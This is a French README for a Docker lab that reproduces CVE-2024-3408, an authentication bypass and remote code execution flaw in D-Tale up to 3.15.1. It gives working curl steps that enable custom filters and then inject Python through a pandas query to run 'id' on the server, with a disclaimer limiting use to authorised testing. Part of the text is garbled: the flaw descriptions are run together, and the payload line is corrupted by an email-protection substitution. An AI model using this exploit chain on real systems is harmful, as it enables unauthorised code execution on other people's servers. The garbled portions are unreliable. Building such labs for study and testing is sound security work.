
Labo de vulnérabilité pour CVE-2024-3408 - Contournement d'authentification & RCE dans D-Tale
Environnement de laboratoire reproductible pour CVE-2024-3408, une vulnérabilité de contournement de l'authentification et d'exécution de code à distance dans D-Tale.
Les versions de D-Tale jusqu'à la 3.15.1 sont vulnérables en raison de :
"Dtale") pour la signature des sessions Flask - permet la falsification des cookies de sessiontest-filter utilise une requête pandas qui peut être abusée pour exécuter du code Python arbitraireCVSS : 9.8 (Critique)
Affecté : D-Tale <= 3.15.1
docker compose up -d --build
D-Tale sera disponible à l'adresse http://localhost:40000
# Étape 1 : Activer les filtres personnalisés
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Attendu : {"success":true}
# Étape 2 : Exécuter une commande via injection de requête pandas
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
--data-urlencode "[email protected].__import__('os').popen('id').read()"
# Attendu : La réponse contient "uid=" et "gid=" (sortie de la commande dans le message d'erreur)
docker compose down
Ce laboratoire est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne pas l'utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.